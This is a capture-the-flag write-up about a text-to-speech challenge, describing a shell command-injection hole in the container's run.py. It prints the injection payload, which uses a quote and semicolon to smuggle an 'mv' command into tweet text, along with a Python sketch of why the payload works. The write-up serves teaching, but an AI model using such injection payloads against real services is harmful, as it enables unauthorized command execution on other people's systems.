Writeup

The server runs text-to-speech software on 4 user-provided tweets and lets you listen to the resulting wav files.
The text-to-speech process runs in a docker image called lumjjb/echo_container.
Inside the docker container, the file run.py performs the text-to-speech (TTS).
The tweets are written to a file named input. The server saves the flag file, which contains the encrypted flag, in the same folder.
This folder is then shared with the docker TTS container.

Line 30 of run.py contains a command execution vulnerability through the variable l.

With the payload ";mv /share/flag "/share/out/1.wav we can move the flag file to a wav file in the out folder.
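
To see why this payload works, here is a minimal sketch. The actual line 30 of run.py is not reproduced in this writeup, so the command template below is only an assumption: the tweet text l is pasted between double quotes into a string that is later handed to a shell. The name tts_tool is a hypothetical placeholder, not the real program.

```python
import shlex

def build_command(l: str) -> str:
    # Hypothetical template (assumption): user text placed inside double
    # quotes in a shell command string, with no escaping at all.
    return 'tts_tool "' + l + '"'

payload = '";mv /share/flag "/share/out/1.wav'
command = build_command(payload)
print(command)

# Naive split on ';' just to show the two commands the shell would see.
first, injected = command.split(";")
print(shlex.split(first))     # the TTS call, now with an empty argument
print(shlex.split(injected))  # the injected mv command
```

The leading quote of the payload closes the string opened by the template, the semicolon starts a new command, and the quote the template appends at the end closes the one opened before /share/out/1.wav.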
After the TTS step, the wav files are converted with ffmpeg and the conversion output is stored in the folder served by the webserver.
Unfortunately, when the flag file (plain text) is moved to a wav file, ffmpeg returns an error and no output file is stored.

So we tried to have the TTS read the flag file directly, but the server returned a 500 error.
The flag file contains lots of unpronounceable characters and is 2470000 chars long: 65000 chars for every character of the flag, so the flag itself is 38 chars long.
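
The length estimate is plain division, which can be checked quickly. The variable names here are only illustrative.

```python
file_length = 2_470_000          # chars in the encrypted flag file
chars_per_flag_char = 65_000     # encrypted chars per plaintext flag char

flag_length, remainder = divmod(file_length, chars_per_flag_char)
print(flag_length, remainder)
```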

So we can write a small payload that decrypts the flag inside the docker container, let the server process the decrypted flag with the TTS and convert the wav, and then listen to the flag.
Since the TTS output wasn’t good, we split the flag text into single chars, each converted to decimal.
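
The char-to-decimal step could look roughly like this. It is a sketch, not the payload we actually sent: the helper names are made up for illustration, the decryption itself is not shown, and the sample text is a stand-in rather than the real flag.

```python
def to_decimal_words(text: str) -> str:
    # One decimal code per character, separated by spaces so the TTS
    # reads each number on its own.
    return " ".join(str(ord(c)) for c in text)

def from_decimal_words(spoken: str) -> str:
    # Inverse step, done by hand after listening: numbers back to chars.
    return "".join(chr(int(n)) for n in spoken.split())

sample = "flag{"  # stand-in text, not the real flag
spoken = to_decimal_words(sample)
print(spoken)
print(from_decimal_words(spoken))
```

Numbers are much easier to understand in synthesized speech than a string of mixed letters and symbols, and the mapping back to characters is unambiguous.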